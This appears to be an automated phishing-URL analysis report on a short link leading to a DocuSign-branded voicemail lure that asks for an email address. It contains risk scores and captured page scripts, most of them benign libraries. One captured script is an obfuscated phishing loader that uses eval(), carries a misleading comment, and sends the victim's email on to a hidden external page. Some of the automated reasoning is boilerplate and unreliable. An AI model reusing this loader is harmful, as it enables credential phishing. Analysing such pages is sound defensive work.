Windows Analysis Report
https://url.rw/ddj4f

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://url.rw

{
    "risk_score": 4,
    "reasoning": "The script has a moderate risk level. It extracts an email address from the URL parameters and populates an input field, which is a common practice. However, it also uses the `eval()` function to execute the decoded script, which is a high-risk indicator. Additionally, the script redirects the user to a URL that includes the extracted email address, which could potentially be used for malicious purposes if the URL is not properly validated."
}

    
	const encodedScript = 'ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2NvbnRpbnVlLWJ1dHRvbicpLmFkZEV2ZW50TGlzdGVuZXIoJ2NsaWNrJywgZnVuY3Rpb24oKSB7DQogICAgICAgIGNvbnRpbnVlTG9hZGluZygpOw0KICAgIH0pOw0KDQogICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3RoZXN1cHdpbGxzdXBpbnRpbWVvZm5lZWRzLWlucHV0JykuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgICAgIGlmIChldmVudC5rZXkgPT09ICdFbnRlcicpIHsNCiAgICAgICAgICAgIGNvbnRpbnVlTG9hZGluZygpOw0KICAgICAgICB9DQogICAgfSk7DQoNCiAgICAvLyBGdW5jdGlvbiB0byBleHRyYWN0IGVtYWlsIGZyb20gVVJMIHBhcmFtZXRlcnMNCiAgICBmdW5jdGlvbiBnZXRFbWFpbEZyb21VUkwoKSB7DQogICAgICAgIGNvbnN0IHVybFBhcmFtcyA9IG5ldyBVUkxTZWFyY2hQYXJhbXMod2luZG93LmxvY2F0aW9uLnNlYXJjaCk7DQogICAgICAgIGZvciAobGV0IHBhcmFtIG9mIHVybFBhcmFtcy52YWx1ZXMoKSkgew0KICAgICAgICAgICAgaWYgKHZhbGlkYXRlRW1haWwocGFyYW0pKSB7DQogICAgICAgICAgICAgICAgcmV0dXJuIHBhcmFtOyAgLy8gUmV0dXJuIHRoZSBmaXJzdCB2YWxpZCBlbWFpbCBmb3VuZA0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQogICAgICAgIHJldHVybiBudWxsOyAgLy8gTm8gZW1haWwgZm91bmQgaW4gdGhlIFVSTA0KICAgIH0NCg0KICAgIC8vIEV4dHJhY3QgZW1haWwgZnJvbSB0aGUgVVJMIGFuZCBzZXQgaXQgaW4gdGhlIGlucHV0IGZpZWxkIGlmIGZvdW5kDQogICAgY29uc3QgZW1haWxGcm9tVVJMID0gZ2V0RW1haWxGcm9tVVJMKCk7DQogICAgaWYgKGVtYWlsRnJvbVVSTCkgew0KICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgndGhlc3Vwd2lsbHN1cGludGltZW9mbmVlZHMtaW5wdXQnKS52YWx1ZSA9IGVtYWlsRnJvbVVSTDsNCiAgICB9DQoNCiAgICBmdW5jdGlvbiBjb250aW51ZUxvYWRpbmcoKSB7DQogICAgICAgIHZhciB0aGVzdXB3aWxsc3VwaW50aW1lb2ZuZWVkcyA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCd0aGVzdXB3aWxsc3VwaW50aW1lb2ZuZWVkcy1pbnB1dCcpLnZhbHVlOw0KICAgICAgICBpZiAodmFsaWRhdGVFbWFpbCh0aGVzdXB3aWxsc3VwaW50aW1lb2ZuZWVkcykpIHsNCiAgICAgICAgICAgIHZhciBsaW5reCA9ICJhSFIwY0hNNkx5OTJhWE5oYjNod2NtOWtkWFJ2Y21FdVkyOXRMbUp5TDNkdmNtc3RiMlptYVdObEwzWnZhV05sTDJsdVpHVjRMbWgwYld3IjsgLy8gQmFzZTY0IGVuY29kZWQgbGluaw0KICAgICAgICAgICAgdmFyIFBsdXNYID0gYXRvYihsaW5reCk7DQogICAgICAgICAgICB2YXIgZmluYWxMaW5rID0gUGx1c1ggKyAiIyIgKyB0aGVzdXB3aWxsc3VwaW50aW1lb2ZuZWVkczsgIC8vIERpcmVjdGx5IGFwcGVuZCB0aGUgZW1haWwgYWRkcmVzcw0KICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLmhyZWYgPSBmaW5hbExpbms7DQogICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICBhbGVydCgiUGxlYXNlIGVudGVyIGEgdmFsaWQgZW1haWwgYWRkcmVzcy4iKTsNCiAgICAgICAgfQ0KICAgIH0NCg0KICAgIGZ1bmN0aW9uIHZhbGlkYXRlRW1haWwoZW1haWwpIHsNCiAgICAgICAgdmFyIHJlID0gL15bXlxzQF0rQFteXHNAXStcLlteXHNAXSskLzsNCiAgICAgICAgcmV0dXJuIHJlLnRlc3QoZW1haWwpOw0KICAgIH0'; // base64 for 'function continueLoading() { alert("Loading..."); }'
const decodedScript = atob(encodedScript);
eval(decodedScript);

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://certoconstrutora.com.br

{
"contains_trigger_text": true,
"trigger_text": "Authenticating...verify your email to access voicemail.",
"prominent_button_name": "Play Voice Message",
"text_input_field_labels": [
"Enter email"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "DocuSign"
  ]
}

```json{  "legit_domain": "docusign.com",  "classification": "wellknown",  "reasons": [    "The brand 'DocuSign' is well-known and typically associated with the domain 'docusign.com'.",    "The provided URL 'certoconstrutora.com.br' does not match the legitimate domain for DocuSign.",    "The URL appears to be related to a Brazilian construction company, which is unrelated to DocuSign.",    "The presence of an email input field on a site not associated with DocuSign raises suspicion of phishing."  ],  "riskscore": 9}
Google indexed: True

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a legitimate plugin for expanding and collapsing content on a web page. It does not contain any high-risk indicators like dynamic code execution, data exfiltration, or redirects to malicious domains. The script uses standard DOM manipulation and event handling techniques, which are common in web development. While it uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, the script seems to be a well-intentioned and relatively benign utility plugin."
}

/* Copyright (C) 2012 Sylvain Hamel
Project: https://github.com/redhotsly/simple-expand
MIT Licence: https://raw.github.com/redhotsly/simple-expand/master/licence-mit.txt */
(function($){"use strict";function e(){var e=this;e.defaults={hideMode:"fadeToggle",defaultSearchMode:"parent",defaultTarget:".content",throwOnMissingTarget:!0,keepStateInCookie:!1,cookieName:"simple-expand"},e.settings={},$.extend(e.settings,e.defaults),e.findLevelOneDeep=function(e,t,n){return e.find(t).filter(function(){return!$(this).parentsUntil(e,n).length})},e.setInitialState=function(t,n){var r=e.readState(t);r?(t.removeClass("collapsed").addClass("expanded"),e.show(n)):(t.removeClass("expanded").addClass("collapsed"),e.hide(n))},e.hide=function(t){e.settings.hideMode==="fadeToggle"?t.hide():e.settings.hideMode==="basic"&&t.hide()},e.show=function(t){e.settings.hideMode==="fadeToggle"?t.show():e.settings.hideMode==="basic"&&t.show()},e.checkKeepStateInCookiePreconditions=function(){if(e.settings.keepStateInCookie&&$.cookie===undefined)throw new Error("simple-expand: keepStateInCookie option requires $.cookie to be defined.")},e.readCookie=function(){var t=$.cookie(e.settings.cookieName);return t===null||t===""?{}:JSON.parse(t)},e.readState=function(t){if(!e.settings.keepStateInCookie)return!1;var n=t.attr("Id");if(n===undefined)return;var r=e.readCookie(),i=r[n]===!0||!1;return i},e.saveState=function(t,n){if(!e.settings.keepStateInCookie)return;var r=t.attr("Id");if(r===undefined)return;var i=e.readCookie();i[r]=n,$.cookie(e.settings.cookieName,JSON.stringify(i),{raw:!0,path:window.location.pathname})},e.toggle=function(t,n){var r=e.toggleCss(t);return e.settings.hideMode==="fadeToggle"?n.fadeToggle(150):e.settings.hideMode==="basic"?n.toggle():$.isFunction(e.settings.hideMode)&&e.settings.hideMode(t,n,r),e.saveState(t,r),!1},e.toggleCss=function(e){return e.hasClass("expanded")?(e.toggleClass("collapsed expanded"),!1):(e.toggleClass("expanded collapsed"),!0)},e.findTargets=function(t,n,r){var i=[];if(n==="absolute")i=$(r);else if(n==="relative")i=e.findLevelOneDeep(t,r,r);else if(n==="parent"){var s=t.parent();do i=e.findLevelOneDeep(s,r,r),i.length===0&&(s=s.parent());while(i.length===0&&s.length!==0)}return i},e.activate=function(t,n){$.extend(e.settings,n),e.checkKeepStateInCookiePreconditions(),t.each(function(){var t=$(this),n=t.attr("data-expander-target")||e.settings.defaultTarget,r=t.attr("data-expander-target-search")||e.settings.defaultSearchMode,i=e.findTargets(t,r,n);if(i.length===0){if(e.settings.throwOnMissingTarget)throw"simple-expand: Targets not found";return this}e.setInitialState(t,i),t.click(function(){return e.toggle(t,i)})})}}window.SimpleExpand=e,$.fn.simpleexpand=function(t){var n=new e;return n.activate(this,t),this}})(jQuery);

{
"contains_trigger_text": true,
"trigger_text": "ERROR 403 - FORBIDDEN",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

{
    "risk_score": 1,
    "reasoning": "This appears to be the standard jQuery library, which is a widely used and trusted JavaScript library. It does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or suspicious redirects. The code is well-structured and does not exhibit any obfuscation or aggressive DOM manipulation. Overall, this script is likely benign and used for legitimate web development purposes."
}

/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[i.call(e)]||"object":typeof e}var t="3.7.1",l=/HTML$/i,ce=function(e,t){return new ce.fn.init(e,t)};function c(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!v(e)&&!y(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}function fe(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()}ce.fn=ce.prototype={jquery:t,constructor:ce,length:0,toArray:function(){return ae.call(this)},get:function(e){return null==e?ae.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=ce.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return ce.each(this,e)},map:function(n){return this.pushStack(ce.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(ae.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(ce.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(ce.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:oe.sort,splice:oe.splice},ce.extend=ce.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||v(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(ce.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||ce.isPlainObject(n)?n:{},i=!1,a[t]=ce.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},ce.extend({expando:"jQuery"+(t+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==i.call(e))&&(!(t=r(e))||"function"==typeof(n=ue.call(t,"constructor")&&t.constructor)&&o.call(n)===a)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){m(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(c(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},text:function(e){var t,n="",r=0,i=e.nodeType;if(!i)while(t=e[r++])n+=ce.text(t);return 1===i||11===i?e.textContent:9===i?e.documentElement.textContent:3===i||4===i?e.nodeValue:n},makeArray:function(e,t){var n=t||[];return null!=e&&(c(Object(e))?ce.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:se.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documentElement;return!l.test(t||n&&n.nodeName||"HTML")},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){va

{
    "risk_score": 2,
    "reasoning": "The provided JavaScript snippet appears to be a part of the WordPress emoji functionality. It does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to malicious domains. The script is primarily responsible for handling the display of emojis on the website, which is a common and legitimate functionality. While it uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, this script is likely benign and does not demonstrate any suspicious behavior."
}

window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/certoconstrutora.com.br\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
/*! This file is auto-generated */
!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);

{
    "risk_score": 2,
    "reasoning": "The provided JavaScript snippet appears to be a simple implementation of a 'scroll to anchor' functionality, which is a common practice on web pages. It checks the user agent for Internet Explorer or Trident-based browsers, and then adds an event listener to the 'hashchange' event. When the hash in the URL changes, it attempts to find an element with the corresponding ID and focuses on it. This behavior is typical for improving user experience and does not demonstrate any high-risk indicators."
}

			/(trident|msie)/i.test(navigator.userAgent)&&document.getElementById&&window.addEventListener&&window.addEventListener("hashchange",function(){var t,e=location.hash.substring(1);/^[A-z0-9_-]+$/.test(e)&&(t=document.getElementById(e))&&(/^(?:a|select|input|button|textarea)$/i.test(t.tagName)||(t.tabIndex=-1),t.focus())},!1);
			

{
    "risk_score": 2,
    "reasoning": "The provided JavaScript snippet appears to be a part of the WordPress emoji functionality. It does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to malicious domains. The script is primarily responsible for handling the display of emojis on the website, which is a common and legitimate functionality. While it uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, the script seems to be a benign part of the WordPress platform and does not demonstrate any suspicious or harmful behavior."
}

window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/certoconstrutora.com.br\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
/*! This file is auto-generated */
!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a utility function for handling sticky positioning of elements on a web page. It does not contain any high-risk indicators like dynamic code execution, data exfiltration, or malicious redirects. The script is primarily focused on DOM manipulation and event handling to achieve the sticky behavior, which is a common and legitimate use case. While it uses some legacy APIs like `XDomainRequest`, the overall functionality is benign and aligned with typical web development practices. Therefore, the risk score is assessed as low (3)."
}

const UAGBBlockPositioning={init(t,e){const s=document.querySelector(e);s?.classList.contains("uagb-position__sticky")&&UAGBBlockPositioning.handleSticky(s,t)},handleSticky(t,e){var s=()=>{return document.querySelector("#wpadminbar")?.offsetHeight||0};const p=()=>{"undefined"!=typeof AOS&&e?.UAGAnimationType&&(t.dataset.aos=e?.UAGAnimationType,t.dataset.aosDuration=e?.UAGAnimationTime,t.dataset.aosDelay=e?.UAGAnimationDelay,t.dataset.aosEasing=e?.UAGAnimationEasing,t.dataset.aosOnce=!0,setTimeout(()=>{AOS.refreshHard()},100))},o=t.getBoundingClientRect(),y=e?.isBlockRootParent?null:t.parentElement,i=((t,e,s)=>{const o=document.createElement("div");if(o.style.height=e.height+"px",s){const i=window.getComputedStyle(t);o.style.width="100%",o.style.maxWidth=i.getPropertyValue("max-width")||e.width+"px",o.style.padding=i.getPropertyValue("padding")||0,o.style.margin=i.getPropertyValue("margin")||0,o.style.border=i.getPropertyValue("border")||0,o.style.borderColor="transparent"}else o.style.width=e.width+"px",o.style.marginTop="0";return o})(t,o,y);let n,a,d,r;const l={top:0,bottom:0},c={top:0,right:0,bottom:0,left:0};if(e?.UAGStickyRestricted){r=y.getBoundingClientRect();const f=window.getComputedStyle(y);c.top=parseInt(f.getPropertyValue("padding-top")||0,10),c.bottom=parseInt(f.getPropertyValue("padding-bottom")||0,10),l.top=r.top+(window.pageYOffset||0)+c.top,l.bottom=r.bottom+(window.pageYOffset||0)-c.bottom-o.height-s()-(e?.UAGStickyOffset||0)}"bottom"===e?.UAGStickyLocation?(n=o.top+(window.pageYOffset||0)-window.innerHeight+o.height+(e?.UAGStickyOffset||0),a=`${e?.UAGStickyOffset||0}px`,window.addEventListener("load",()=>{(d=void 0!==window.pageYOffset?window.pageYOffset:document.body.scrollTop)<=n&&!t.classList.contains("uagb-position__sticky--stuck")&&(t.parentNode.insertBefore(i,t),t.classList.add("uagb-position__sticky--stuck"),t.style.bottom=`calc(${a} - ${window.innerHeight}px)`,t.style.left=o.left+"px",t.style.width=o.width+"px",t.style.zIndex="999",setTimeout(()=>{t.style.bottom=a},50)),p()}),window.addEventListener("scroll",()=>{(d=void 0!==window.pageYOffset?window.pageYOffset:document.body.scrollTop)<=n?t.classList.contains("uagb-position__sticky--stuck")||(t.parentNode.insertBefore(i,t),t.classList.add("uagb-position__sticky--stuck"),t.style.bottom=a,t.style.left=o.left+"px",t.style.width=o.width+"px",t.style.zIndex="999"):d>n&&t.classList.contains("uagb-position__sticky--stuck")&&(t.parentNode.removeChild(i),t.classList.remove("uagb-position__sticky--stuck"),t.style.bottom="",t.style.left="",t.style.width="",t.style.zIndex="")})):(n=o.top+(window.pageYOffset||0)-s()-(e?.UAGStickyOffset||0),a=s()+(e?.UAGStickyOffset||0)+"px",window.addEventListener("load",()=>{(d=void 0!==window.pageYOffset?window.pageYOffset:document.body.scrollTop)>=n&&!t.classList.contains("uagb-position__sticky--stuck")&&(t.parentNode.insertBefore(i,t),t.classList.add("uagb-position__sticky--stuck"),e?.UAGStickyRestricted&&d>=l.bottom?(t.classList.remove("uagb-position__sticky--stuck"),t.classList.add("uagb-position__sticky--restricted"),t.style.top="",t.style.bottom=c.bottom+"px",t.style.left=`${i?.offsetLeft||0}px`):(t.style.top=`calc(${a} - ${window.innerHeight}px)`,t.style.left=o.left+"px",setTimeout(()=>{t.style.top=a},50)),t.style.width=o.width+"px",t.style.zIndex="999"),p()}),window.addEventListener("scroll",()=>{(d=void 0!==window.pageYOffset?window.pageYOffset:document.body.scrollTop)>=n?t.classList.contains("uagb-position__sticky--stuck")||t.classList.contains("uagb-position__sticky--restricted")?e?.UAGStickyRestricted&&!t.classList.contains("uagb-position__sticky--restricted")&&d>=l.bottom?(t.classList.remove("uagb-position__sticky--stuck"),t.classList.add("uagb-position__sticky--restricted"),t.style.top="",t.style.bottom=c.bottom+"px",t.style.left=`${i?.offsetLeft||0}px`):t.classList.contains("uagb-position__sticky--restricted")&&d<l.bottom&&(t.classList.remove("uagb-position__sticky--restricted"),t.classList.add("uagb-position__stick

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a legitimate script that is used for previewing starter templates in an iframe. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The script primarily focuses on manipulating the DOM to update the site logo, color palette, and typography based on the provided data. While it uses some legacy practices like `XDomainRequest`, these are not inherently malicious and are likely used for compatibility reasons. Overall, the script seems to be part of a legitimate web application and does not demonstrate any suspicious or malicious behavior."
}

(()=>{var e={n:t=>{var a=t&&t.__esModule?()=>t.default:()=>t;return e.d(a,{a}),a},d:(t,a)=>{for(var o in a)e.o(a,o)&&!e.o(t,o)&&Object.defineProperty(t,o,{enumerable:!0,get:a[o]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t)};(()=>{"use strict";const t=window.wp.domReady;var a=e.n(t);const o=()=>window.location.href!==window.parent.location.href,n="starter-templates-iframe-preview-data",r=()=>{let e="";const t=document.querySelector(".site-logo-img img");return t&&(e=t.src),e};let s=r();const l=(e,t)=>{if(!e)return"";if(e){const a=e.match(/'([^']+)'/);return a?a[1]:"inherit"===e?t:e}return t||void 0},i=e=>{switch(e.value.param){case"siteLogo":const t=document.querySelectorAll(".site-logo-img img");""===s&&(s=r());let a=e.value.data.url||s;if(a=e.value.data.dataUri||a,0===t.length&&""!==a){const t=document.createElement("span");t.classList.add("site-logo-img");const o=document.createElement("a");o.setAttribute("class","custom-logo-link"),o.setAttribute("href","#"),o.setAttribute("aria-current","page"),t.appendChild(o);const n=document.createElement("img");n.classList.add("custom-logo"),n.setAttribute("src",a),o.appendChild(n);const r=document.getElementById("ast-desktop-header").querySelectorAll(".ast-site-identity")[0],s=r.querySelectorAll(".ast-site-title-wrap")[0];r.insertBefore(t,s);const l=e.value.data.width||"";""!==l&&(n.style.width=l+"px",n.style.maxWidth=l+"px")}else if(""!==a)for(const[o,n]of Object.entries(t)){n.removeAttribute("srcset"),n.setAttribute("src",a);const t=e.value.data.width;""!==t&&(n.style.width=t+"px",n.style.maxWidth=t+"px")}break;case"colorPalette":const o=e.value.data.colors||[],n=starter_templates_zip_preview.AstColorPaletteVarPrefix,i=starter_templates_zip_preview.AstEleColorPaletteVarPrefix;if(0===o.length){document.querySelector("body").classList.remove("starter-templates-preview-palette");const e=document.getElementsByClassName("starter-templates-preview-palette");return void(e.length>0&&e[0].remove())}document.querySelector("body").classList.add("starter-templates-preview-palette");const 